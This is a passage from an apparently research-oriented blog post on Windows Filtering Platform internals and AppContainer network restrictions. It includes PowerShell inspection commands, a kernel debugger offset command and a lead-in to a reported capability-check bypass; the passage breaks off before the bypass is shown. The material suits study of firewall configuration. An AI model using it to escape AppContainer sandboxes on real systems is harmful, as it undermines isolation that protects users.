I'll also take the opportunity to give an overview of how the Windows Firewall functions and how you can use some of my tooling to inspect the current firewall configuration. This will provide security researchers with the information they need to better understand the firewall and assess its configuration to find other security issues similar to the one I reported. At the same time I'll note some interesting quirks in the implementation which you might find useful.

Windows Firewall Architecture Primer

Before we can understand how network access is controlled in an AppContainer we need to understand how the built-in Windows firewall functions. Prior to XP SP2 Windows didn't have a built-in firewall, and you would typically install a third-party firewall such as ZoneAlarm. These firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone.

While XP SP2 introduced the built-in firewall, the basis for the one used in modern versions of Windows was introduced in Vista as the Windows Filtering Platform (WFP). However, as a user you wouldn't typically interact directly with WFP. Instead you'd use a firewall product which exposes a user interface, and then configures WFP to do the actual firewalling. On a default installation of Windows this would be the Windows Defender Firewall. If you installed a third-party firewall this would replace the Defender component but the actual firewall would still be implemented through configuring WFP.

Architectural diagram of the built-in Windows Firewall. Showing a separation between user components (MPSSVC, BFE) and the kernel components (AFD, TCP/IP, NETIO and Callout Drivers)

The diagram gives an overview of how various components in the OS are connected together to implement the firewall. A user would interact with the Windows Defender firewall using the GUI, or a command line interface such as PowerShell's NetSecurity module. This interface communicates with the Windows Defender Firewall Service (MPSSVC) over RPC to query and modify the firewall rules.

MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel which is where the firewall processing is handled. The device objects (such as \Device\WFP) which the TCP/IP driver exposes are secured so that only the BFE service can access them. This means all access to the kernel firewall needs to be mediated through the service.

When an application, such as a Web Browser, creates a new network socket the AFD driver responsible for managing sockets will communicate with the TCP/IP driver to configure the socket for IP. At this point the TCP/IP driver will capture the security context of the creating process and store that for later use by the firewall. When an operation is performed on the socket, such as making or accepting a new connection, the firewall filters will be evaluated.

The evaluation is handled primarily by the NETIO driver as well as registered callout drivers. These callout drivers allow for more complex firewall rules to be implemented as well as inspecting and modifying network traffic. The drivers can also forward checks to user-mode services. As an example, the ability to forward checks to user mode allows the Windows Defender Firewall to display a UI when an unknown application listens on a wildcard address, as shown below.

Dialog displayed by the Windows Firewall service when an unknown application tries to listen for incoming connections.

The end result of the evaluation is whether the operation is permitted or blocked. The behavior of a block depends on the operation. If an outbound connection is blocked the caller is notified. If an inbound connection is blocked the firewall will drop the packets and provide no notification to the peer, such as a TCP Reset or ICMP response. This default drop behavior can be changed through a system wide configuration change. Let's dig into more detail on how the rules are configured for evaluation.

Layers, Sublayers and Filters

The firewall rules are configured using three types of object: layers, sublayers and filters as shown in the following diagram.

Diagram showing the relationship between layers, sublayers and filters. Each layer can have one or more sublayers which in turn has one or more associated filters.

The firewall layer is used to categorize the network operation to be evaluated. For example there are separate layers for inbound and outbound packets. This is typically further differentiated by IP version, so there are separate IPv4 and IPv6 layers for inbound and outbound packets. While the firewall is primarily focussed on IP traffic there does exist limited MAC and Virtual Switch layers to perform specialist firewalling operations. You can find the list of pre-defined layers on MSDN here. As the WFP needs to know what layer handles which operation there's no way for additional layers to be added to the system by a third-party application.

When a packet is evaluated by a layer the WFP performs Filter Arbitration. This is a set of rules which determine the order of evaluation of the filters. First WFP enumerates all registered filters which are associated with the layer's unique GUID. Next, WFP groups the filters by their sublayer's GUID and orders the filter groupings by a weight value which was specified when the sublayer was registered. Finally, WFP evaluates each filter according to the order based on a weight value specified when the filter was registered.

For every filter, WFP checks if the list of conditions match the packet and its associated meta-data. If the conditions match then the filter performs a specified action, which can be one of the following:

  • Permit
  • Block
  • Callout Terminating
  • Callout Unknown
  • Callout Inspection

If the action is Permit or Block then the filter evaluation for the current sublayer is terminated with that action as the result. If the action is a callout then WFP will invoke the filter's registered callout driver's classify function to perform additional checks. The classify function can evaluate the packet and its meta-data and specify a final result of Permit, Block or additionally Continue which indicates the filter should be ignored. In general if the action is Callout Terminating then it should only set Permit and Block, and if it's Callout Inspection then it should only set Continue. The Callout Unknown action is for callouts which might terminate or might not depending on the result of the classification.

Once a terminating filter has been evaluated WFP stops processing that sublayer. However, WFP will continue to process the remaining sublayers in the same way regardless of the final result. In general if any sublayer returns a Block result then the packet will be blocked, otherwise it'll be permitted. This means that if a higher priority sublayer's result is Permit, it can still be blocked by a lower-priority sublayer.

A filter can be configured with the FWPM_FILTER_FLAG_CLEAR_ACTION_RIGHT flag which indicates that the result should be considered “hard” allowing a higher priority filter to permit a packet which can't be overridden by a lower-priority blocking filter. The rules for the final result are even more complex than I make out including soft blocks and vetos, refer to the page in MSDN for more information.

 

To simplify the classification of network traffic, WFP provides a set of stateful layers which correspond to major network events such as TCP connection and port binding. The stateful filtering is referred to as Application Layer Enforcement (ALE). For example the FWPM_LAYER_ALE_AUTH_CONNECT_V4 layer will be evaluated when a TCP connection using IPv4 is being made.

For any given connection it will only be evaluated once, not for every packet associated with the TCP connection handshake. In general these ALE layers are the ones we'll focus on when inspecting the firewall configuration, as they're the most commonly used. The three main ALE layers you're going to need to inspect are the following:

Name

Description

FWPM_LAYER_ALE_AUTH_CONNECT_V4/6

Processed when TCP connect() called.

FWPM_LAYER_ALE_AUTH_LISTEN_V4/6

Processed when TCP listen() called.

FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4/6

Processed when a packet/connection is received.

What layers are used and in what order they are evaluated depend on the specific operation being performed. You can find the list of the layers for TCP packets here and UDP packets here. Now, let's dig into how filter conditions are defined and what information they can check.

Filter Conditions

Each filter contains an optional list of conditions which are used to match a packet. If no list is specified then the filter will always match any incoming packet and perform its defined action. If more than one condition is specified then the filter is only matched if all of the conditions match. If you have multiple conditions of the same type they're OR'ed together, which allows a single filter to match on multiple values.

Each condition contains three values:

  • The layer field to check.
  • The value to compare against.
  • The match type, for example the packet value and the condition value are equal.

Each layer has a list of fields that will be populated whenever a filter's conditions are checked. The field might directly reflect a value from the packet, such as the destination IP address or the interface the packet is traversing. Or it could be a metadata value, such as the user identity of the process which created the socket. Some common fields are as follows:

Field Type

Description

FWPM_CONDITION_IP_REMOTE_ADDRESS

The remote IP address.

FWPM_CONDITION_IP_LOCAL_ADDRESS

The local IP address.

FWPM_CONDITION_IP_PROTOCOL

The IP protocol type, e.g. TCP or UDP

FWPM_CONDITION_IP_REMOTE_PORT

The remote protocol port.

FWPM_CONDITION_IP_LOCAL_PORT

The local protocol port.

FWPM_CONDITION_ALE_USER_ID

The user's identity.

FWPM_CONDITION_ALE_REMOTE_USER_ID

The remote user's identity.

FWPM_CONDITION_ALE_APP_ID

The path to the socket's executable.

FWPM_CONDITION_ALE_PACKAGE_ID

The user's AppContainer package SID.

FWPM_CONDITION_FLAGS

A set of additional flags.

FWPM_CONDITION_ORIGINAL_PROFILE_ID

The source network interface profile.

FWPM_CONDITION_CURRENT_PROFILE_ID

The current network interface profile.

The value to compare against the field can take different values depending on the field being checked. For example the field FWPM_CONDITION_IP_REMOTE_ADDRESS can be compared to IPv4 or IPv6 addresses depending on the layer it's used in. The value can also be a range, allowing a filter to match on an IP address within a bounded set of addresses.

The FWPM_CONDITION_ALE_USER_ID and FWPM_CONDITION_ALE_PACKAGE_ID conditions are based on the access token captured when creating the TCP or UDP socket. The FWPM_CONDITION_ALE_USER_ID stores a security descriptor which is used with an access check with the creator's token. If the token is granted access then the condition is considered to match. For FWPM_CONDITION_ALE_PACKAGE_ID the condition checks the package SID of the AppContainer token. If the token is not an AppContainer then the filtering engine sets the package SID to the NULL SID (S-1-0-0).

The FWPM_CONDITION_ALE_REMOTE_USER_ID is similar to the FWPM_CONDITION_ALE_USER_ID condition but compares against the remote authenticated user. In most cases sockets are not authenticated, however if IPsec is in use that can result in a remote user token being available to compare. It's also used in some higher-level layers such as RPC filters.

The match type can be one of the following:

  • FWP_MATCH_EQUAL
  • FWP_MATCH_EQUAL_CASE_INSENSITIVE
  • FWP_MATCH_FLAGS_ALL_SET
  • FWP_MATCH_FLAGS_ANY_SET
  • FWP_MATCH_FLAGS_NONE_SET
  • FWP_MATCH_GREATER
  • FWP_MATCH_GREATER_OR_EQUAL
  • FWP_MATCH_LESS
  • FWP_MATCH_LESS_OR_EQUAL
  • FWP_MATCH_NOT_EQUAL
  • FWP_MATCH_NOT_PREFIX
  • FWP_MATCH_PREFIX
  • FWP_MATCH_RANGE

The match types should hopefully be self explanatory based on their names. How the match is interpreted depends on the field's type and the value being used to check against.

Inspecting the Firewall Configuration

We now have an idea of the basics of how WFP works to filter network traffic. Let's look at how to inspect the current configuration. We can't use any of the normal firewall commands or UIs such as the PowerShell NetSecurity module as I already mentioned these represent the Windows Defender view of the firewall.

Instead we need to use the RPC APIs BFE exposes to access the configuration, for example you can access a filter using the FwpmFilterGetByKey0 API. Note that the BFE maintains security descriptors to restrict access to WFP objects. By default nothing can be accessed by non-administrators, therefore you'd need to call the RPC APIs while running as an administrator.

You could implement your own tooling to call all the different APIs, but it'd be much easier if someone had already done it for us. For built-in tools the only one I know of is using netsh with the wfp namespace. For example to dump all the currently configured filters you can use the following command as an administrator:

PS> netsh wfp show filters file = -

This will print all filters in an XML format to the console. Be prepared to wait a while for the output to complete. You can also dump straight to a file. Of course you now need to interpret the XML results. It is possible to also specify certain parameters, such as local and remote addresses to reduce the output to only matching filters.

Processing an XML file doesn't sound too appealing. To make the firewall configuration easier to inspect I've added many of the BFE APIs to my NtObjectManager PowerShell module from version 1.1.32 onwards. The module exposes various commands which will return objects representing the current WFP configuration which you can easily use to inspect and group the results however you see fit.

Layer Configuration

Even though the layers are predefined in the WFP implementation it's still useful to be able to query the details about them. For this you can use the Get-FwLayer command.

PS> Get-FwLayer

KeyName                           Name                                    

-------                           ----                                    

FWPM_LAYER_OUTBOUND_IPPACKET_V6   Outbound IP Packet v6 Layer            

FWPM_LAYER_IPFORWARD_V4_DISCARD   IP Forward v4 Discard Layer            

FWPM_LAYER_ALE_AUTH_LISTEN_V4     ALE Listen v4 Layer

...

The output shows the SDK name for the layer, if it has one, and the name of the layer that the BFE service has configured. The layer can be queried by its SDK name, its GUID or a numeric ID, which we will come back to later. As we mostly only care about the ALE layers then there's a special AleLayer parameter to query a specific layer without needing to remember the full name or ID.

PS> (Get-FwLayer -AleLayer ConnectV4).Fields

KeyName                          Type      DataType              

-------                          ----      --------              

FWPM_CONDITION_ALE_APP_ID        RawData   ByteBlob              

FWPM_CONDITION_ALE_USER_ID       RawData   TokenAccessInformation

FWPM_CONDITION_IP_LOCAL_ADDRESS  IPAddress UInt32                

...

Each layer exposes the list of fields which represent the conditions which can be checked in that layer, you can access the list through the Fields property. The output shown above contains a few of the condition types we saw earlier in the table of conditions. The output also shows the type of the condition and the data type you should provide when filtering on that condition.

PS> Get-FwSubLayer | Sort-Object Weight | Select KeyName, Weight

KeyName                                   Weight

-------                                   ------

FWPM_SUBLAYER_INSPECTION                       0

FWPM_SUBLAYER_TEREDO                           1

MICROSOFT_DEFENDER_SUBLAYER_FIREWALL           2

MICROSOFT_DEFENDER_SUBLAYER_WSH                3

MICROSOFT_DEFENDER_SUBLAYER_QUARANTINE         4            

...

You can also inspect the sublayers in the same way, using the Get-FwSubLayer command as shown above. The most useful information from the sublayer is the weight. As mentioned earlier this is used to determine the ordering of the associated filters. However, as we'll see you rarely need to query the weight yourself.

Filter Configuration

Enforcing the firewall rules is up to the filters. You can enumerate all filters using the Get-FwFilter command.

PS> Get-FwFilter

FilterId ActionType Name

-------- ---------- ----

68071    Block     Boot Time Filter

71199    Permit    @FirewallAPI.dll,-80201

71350    Block     Block inbound traffic to dmcertinst.exe

...

The default output shows the ID of a filter, the action type and the user defined name. The filter objects returned also contain the layer and sublayer identifiers as well as the list of matching conditions for the filter. As inspecting the filter is going to be the most common operation the module provides the Format-FwFilter command to format a filter object in a more readable format.

PS> Get-FwFilter -Id 71350 | Format-FwFilter

Name       : Block inbound traffic to dmcertinst.exe

Action Type: Block

Key        : c391b53a-1b98-491c-9973-d86e23ea8a84

Id         : 71350

Description:

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : Indexed

Weight     : 549755813888

Conditions :

FieldKeyName              MatchType Value

------------              --------- -----

FWPM_CONDITION_ALE_APP_ID Equal    

\device\harddiskvolume3\windows\system32\dmcertinst.exe

The formatted output contains the layer and sublayer information, the assigned weight of the filter and the list of conditions. The layer is FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 which handles new incoming connections. The sublayer is MICROSOFT_DEFENDER_SUBLAYER_WSH which is used to group Windows Service Hardening rules which apply regardless of the normal firewall configuration.

In this example the filter only matches on the socket creator process executable's path. The end result if the filter matches the current state is for the IPv4 TCP network connection to be blocked at the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. As already mentioned it now won't matter if a lower priority layer would permit the connection if the block is enforced.

How can we determine the ordering of sublayers and filters? You could manually extract the weights for each sublayer and filter and try and order them, and hopefully the ordering you come up with matches what WFP uses. A much simpler approach is to specify a flag when enumerating filters for a particular layer to request the BFE APIs sort the filters using the canonical ordering.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted

FilterId ActionType     Name

-------- ----------     ----

65888    Permit         Interface Un-quarantine filter

66469    Block          AppContainerLoopback

66467    Permit         AppContainerLoopback

66473    Block          AppContainerLoopback

...

The Sorted parameter specifies the flag to sort the filters. You can now go through the list of filters in order and try and work out what would be the matched filter based on some criteria you decide on. Again it'd be helpful if we could get the BFE service to do more of the hard work in figuring out what rules would apply given a particular process. For this we can specify some of the metadata that represents the connection being made and get the BFE service to only return filters which match on their conditions.

PS> $template = New-FwFilterTemplate -AleLayer ConnectV4 -Sorted

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

65

PS> Add-FwCondition $template -ProcessId $pid

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> Add-FwCondition $template -IPAddress $addr.Address -Port 80

PS> Add-FwCondition $template -ProtocolType Tcp

PS> Add-FwCondition $template -ConditionFlags 0

PS> $template.Conditions

FieldKeyName                     MatchType Value                                                                    

------------                     --------- -----                                                                    

FWPM_CONDITION_ALE_APP_ID        Equal     \device\harddisk...

FWPM_CONDITION_ALE_USER_ID       Equal     FirewallTokenInformation                        

FWPM_CONDITION_ALE_PACKAGE_ID    Equal     S-1-0-0

FWPM_CONDITION_IP_REMOTE_ADDRESS Equal     142.250.72.196

FWPM_CONDITION_IP_REMOTE_PORT    Equal     80

FWPM_CONDITION_IP_PROTOCOL       Equal     Tcp

FWPM_CONDITION_FLAGS             Equal     None

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

2

To specify the metadata we need to create an enumeration template using the New-FwFilterTemplate command. We specify the Connect IPv4 layer as well as requesting that the results are sorted. Using this template with the Get-FwFilter command returns 65 results (on my machine).

Next we add some metadata, first from the current powershell process. This populates the App ID with the executable path as well as token information such as the user ID and package ID of an AppContainer. We then add details about the target connection request, specifying a TCP connection to www.google.com on port 80. Finally we add some condition flags, we'll come back to these flags later.

Using this new template results in only 2 filters whose conditions will match the metadata. Of course depending on your current configuration the number might be different. In this case 2 filters is much easier to understand than 65. If we format those two filter we see the following:

PS> $fs | Format-FwFilter

Name       : Default Outbound

Action Type: Permit

Key        : 07ba2a96-0364-4759-966d-155007bde926

Id         : 67989

Description: Default Outbound

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : None

Weight     : 9223372036854783936

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public    

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

Name       : Default Outbound

Action Type: Permit

Key        : 36da9a47-b57d-434e-9345-0e36809e3f6a

Id         : 67993

Description: Default Outbound

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : None

Weight     : 3458764513820540928

Both of the two filters permit the connection and based on the name they're the default backstop when no other filters match. It's possible to configure each network profile with different default backstops. In this case the default is to permit outbound traffic. We have two of them because both match all the metadata we provided, although if we'd specified a profile other than Public then we'd only get a single filter.

Can we prove that this is the filter which matches a TCP connection? Fortunately we can: WFP supports gathering network events related to the firewall. An event includes the filter which permitted or denied the network request, and we can then compare it to our two filters to see if one of them matched. You can use the Get-FwNetEvent command to read the current circular buffer of events.

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $s = [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $ev_temp = New-FwNetEventTemplate -Condition $template.Conditions

PS> Add-FwCondition $ev_temp -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $ev_temp | Format-List

FilterId        : 67989

LayerId         : 48

ReauthReason    : 0

OriginalProfile : Public

CurrentProfile  : Public

MsFwpDirection  : 0

IsLoopback      : False

Type            : ClassifyAllow

Flags           : IpProtocolSet, LocalAddrSet, RemoteAddrSet, ...

Timestamp       : 8/5/2021 11:24:41 AM

IPProtocol      : Tcp

LocalEndpoint   : 10.0.0.101:63046

RemoteEndpoint  : 142.250.72.196:80

ScopeId         : 0

AppId           : \device\harddiskvolume3\windows\system32\wind...

UserId          : S-1-5-21-4266194842-3460360287-487498758-1103

AddressFamily   : Inet

PackageSid      : S-1-0-0

First we enable the ClassifyAllow event, which is generated when a firewall event is permitted. By default only firewall blocks are recorded using the ClassifyDrop event to avoid filling the small network event log with too much data. Next we make a connection to the Google web server we queried earlier to generate an event. We then disable the ClassifyAllow events again to reduce the risk we'll lose the event.

Next we can query for the current stored events using Get-FwNetEvent. To limit the network events returned to us we can specify a template in a similar way to when we queried for filters. In this case we create a new template using the New-FwNetEventTemplate command and copy the existing conditions from our filter template. We then add a condition to match on only ClassifyAllow events.

Formatting the results we can see the network connection event to TCP port 80. Crucially if you compare the FilterId value to the Id fields in the two enumerated filters we match the first filter. This gives us confidence that we have a basic understanding of how the filtering works. Let's move on to running some tests to determine how the AppContainer network restrictions are implemented through WFP.

Worth noting at this point that because the network event buffer can be small, of the order of 30-40 events depending on load, it's possible on a busy server that events might be lost before you query for them. You can get a real-time trace of events by using the Start-FwNetEventListener command to avoid losing events.

Callout Drivers

As mentioned a developer can implement their own custom functionality to inspect and modify network traffic. This functionality is used by various different products, ranging from AV to scan your network traffic for badness to NMAP's NPCAP capturing loopback traffic.

To set up a callout the developer needs to do two things. First they need to register its callback functions for the callout using the FwpmCalloutRegister API in the kernel driver. Second they need to create a filter to use the callout by specifying the providerContextKey GUID and one of the action types which invoke a callout.

You can query the list of registered callouts using the FwpmCalloutEnum0 API in user-mode. I expose this API through the Get-FwCallout command.

PS> Get-FwCallout | Sort CalloutId | Select CalloutId, KeyName

CalloutId KeyName

--------- -------

        1 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V4

        2 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V6

        3 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V4

        4 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V6

        5 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V4

        6 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V6

...

The above output shows the callouts listed by their callout ID numbers. The ID number is key to finding the callback functions in the kernel. There doesn't seem to be a way of enumerating the addresses of callout functions directly (at least from user mode). This article shows a basic approach to extract the callback functions using a kernel debugger, although it's a little out of date.

The NETIO driver stores all registered callbacks in a large array, the index being the callout ID. If you want to find a specific callout then find the base of the array using the description in the article then just calculate the offset based on a single callout structure and the index. For example on Windows 10 21H1 x64 the following command will dump a callout's classify callback function. Replace N with the callout ID, the magic numbers 198 and 50 are the offset into the gWfpGlobal global data table and the size of a callout entry which you can discover through analyzing the code.

0: kd> ln poi(poi(poi(NETIO!gWfpGlobal)+198)+(50*N)+10)

If you're in kernel mode there's an undocumented KfdGetRefCallout function (and a corresponding KfdDeRefCallout to decrement the reference) exported by NETIO which will return a pointer to the internal callout structure based on the ID avoiding the need to extract the offsets from disassembly.

AppContainer Network Restrictions

The basics of accessing the network from an AppContainer sandbox is documented by Microsoft. Specifically the lowbox token used for the sandbox needs to have one or more capabilities enabled to grant access to the network. The three capabilities are:

  • internetClient - Grants client access to the Internet
  • internetClientServer - Grants client and server access to the Internet
  • privateNetworkClientServer - Grants client and server access to local private networks.

Client Capabilities

Pretty much all Windows Store applications are granted the internetClient capability as accessing the Internet is a thing these days. Even the built-in calculator has this capability, presumably so you can fill in feedback on how awesome a calculator it is.

Image showing the list of capabilities granted to Windows calculator application showing the “Your Internet Connection” capability is granted.

However, this shouldn't grant the ability to act as a network server, for that you need the internetClientServer capability. Note that Windows defaults to blocking incoming connections, so just because you have the server capability still doesn't ensure you can receive network connections. The final capability is privateNetworkClientServer which grants access to private networks as both a client and a server. What is the internet and what is private isn't made immediately clear, hopefully we'll find out from inspecting the firewall configuration.

PS> $token = Get-NtToken -LowBox -PackageSid TEST

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> $sock = Invoke-NtToken $token {

>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

Exception calling ".ctor" with "2" argument(s): "An attempt was made to access a socket in a way forbidden by its access permissions 216.58.194.164:80"

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyDrop

PS> Get-FwNetEvent -Template $template | Format-List

FilterId               : 71079

LayerId                : 48

ReauthReason           : 0

...

PS> Get-FwFilter -Id 71079 | Format-FwFilter

Name       : Block Outbound Default Rule

Action Type: Block

Key        : fb8f5cab-1a15-4616-b63f-4a0d89e527f8

Id         : 71079

Description: Block Outbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 274877906944

Conditions :

FieldKeyName                  MatchType Value

------------                  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID NotEqual  NULL SID

In the above output we first create a lowbox token for testing the AppContainer access. In this example we don't provide any capabilities for the token so we're expecting the network connection should fail. Next we connect a TcpClient socket while impersonating the lowbox token, and the connection is immediately blocked with an error.

We then get the network event corresponding to the connection request to see what filter blocked the connection. Formatting the filter from the network event we find the “Block Outbound Default Rule”. This will block any AppContainer network connection, based on the FWPM_CONDITION_ALE_PACKAGE_ID condition which hasn't been permitted by higher priority firewall filters.

Like with the “Default Outbound” filter we saw earlier, this is a backstop if nothing else matches. Unlike that earlier filter the default is to block rather than permit the connection. Another thing to note is the sublayer name. For “Block Outbound Default Rule” it's MICROSOFT_DEFENDER_SUBLAYER_WSH which is used for built-in filters which aren't directly visible from the Defender firewall configuration. Whereas MICROSOFT_DEFENDER_SUBLAYER_FIREWALL is used for “Default Outbound”, which is a lower priority sublayer (based on its weight) and thus would never be evaluated due to the higher priority block.

Okay, we know how connections are blocked. Therefore there must be a higher priority filter which permits the connection within the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. We could go back to manual inspection, but we might as well just see what the network event shows as the matching filter when we grant the internetClient capability.

PS> $cap = Get-NtSid -KnownSid CapabilityInternetClient

PS> $token = Get-NtToken -LowBox -PackageSid TEST -CapabilitySid $cap

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $sock = Invoke-NtToken $token {

>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $template | Format-List

FilterId        : 71075

LayerId         : 48

ReauthReason    : 0

...

PS> Get-FwFilter -Id 71075 | Format-FwFilter

Name       : InternetClient Default Rule

Action Type: Permit

Key        : 406568a7-a949-410d-adbb-2642ec3e8653

Id         : 71075

Description: InternetClient Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 412316868544

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)

In this example we create a new token using the same package SID but with internetClient capability. When we connect the socket we now no longer get an error and the connection is permitted. Checking for the ClassifyAllow event we find the “InternetClient Default Rule” filter matched the connection.

Looking at the conditions we can see that it will only match if the socket creator is in an AppContainer based on the FWPM_CONDITION_ALE_PACKAGE_ID condition. The FWPM_CONDITION_ALE_USER_ID also ensures that it will only match if the creator has the internetCapability capability which is S-1-15-3-1 in the SDDL format. This filter is what's granting access to the network.

One odd thing is in the FWPM_CONDITION_IP_REMOTE_ADDRESS condition. It seems to match on all possible IPv4 addresses. Shouldn't this exclude network addresses on our local “private” network? At the very least you'd assume this would block the reserved IP address ranges from RFC1918? The key to understanding this is the profile ID conditions, which are both set to Public. The computer I'm running these commands on has a single network interface configured to the public profile as shown:

Image showing the option of either Public or Private network profiles.

Therefore the firewall is configured to treat all network addresses in the same context, granting the internetClient capability access to any address including your local “private” network. This might be unexpected. In fact if you enumerate all the filters on the machine you won't find any filter to match the privateNetworkClientServer capability and using the capability will not grant access to any network resource.

If you switch the network profile to Private, you'll find there's now three “InternetClient Default Rule” filters (note on Windows 11 there will only be one as it uses the OR'ing feature of conditions as mentioned above to merge the three rules together).

Name       : InternetClient Default Rule

Action Type: Permit

...

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 10.0.0.0

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private

...

Name       : InternetClient Default Rule

Action Type: Permit

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 239.255.255.255 High: 255.255.255.255

...

Name       : InternetClient Default Rule

Action Type: Permit

...

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 10.255.255.255 High: 224.0.0.0

...

As you can see in the first filter, it covers addresses 0.0.0.0 to 10.0.0.0. The machine's private network is 10.0.0.0/8. The profile IDs are also now set to Private. The other two exclude the entire 10.0.0.0/8 network as well as the multicast group addresses from 224.0.0.0 to 240.0.0.0.

The profile ID conditions are important here if you have more than one network interface. For example if you have two, one Public and one Private, you would get a filter for the Public network covering the entire IP address range and the three Private ones excluding the private network addresses. The Public filter won't match if the network traffic is being sent from the Private network interface preventing the application without the right capability from accessing the private network.

Speaking of which, we can also now identify the filter which will match the private network capability. There's two, to cover the private network range and the multicast range. We'll just show one of them.

Name       : PrivateNetwork Outbound Default Rule

Action Type: Permit

Key        : e0194c63-c9e4-42a5-bbd4-06d90532d5e6

Id         : 71640

Description: PrivateNetwork Outbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 36029209335832512

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 10.0.0.0 High: 10.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)

We can see in the FWPM_CONDITION_ALE_USER_ID condition that the connection would be permitted if the creator has the privateNetworkClientServer capability, which is S-1-15-3-3 in SDDL.

It is slightly ironic that the Public network profile is probably recommended even if you're on your own private network (Windows 11 even makes the recommendation explicit as shown below) in that it should reduce the exposed attack surface of the device from others on the network. However if an AppContainer application with the internetClient capability could be compromised it opens up your private network to access where the Private profile wouldn't.

Image showing the option of either Public or Private network profiles. This is from Windows 11 where Public is marked as recommended.

Aside: one thing you might wonder, if your network interface is marked as Private and the AppContainer application only has the internetClient capability, what happens if your DNS server is your local router at 10.0.0.1? Wouldn't the application be blocked from making DNS requests? Windows has a DNS client service which typically is always running. This service is what usually makes DNS requests on behalf of applications as it allows the results to be cached. The RPC server which the service exposes allows callers which have any of the three network capabilities to connect to it and make DNS requests, avoiding the problem. Of course if the service is disabled in-process DNS lookups will start to be used, which could result in weird name resolving issues depending on your network configuration.

We can now understand how issue 2207 I reported to Microsoft bypasses the capability requirements. If in the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer for an outbound connection there are Permit filters which are evaluated before the “Block Outbound Default Rule” filter then it might be possible to avoid needing capabilities.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted |

Where-Object SubLayerKeyName -eq MICROSOFT_DEFENDER_SUBLAYER_WSH |
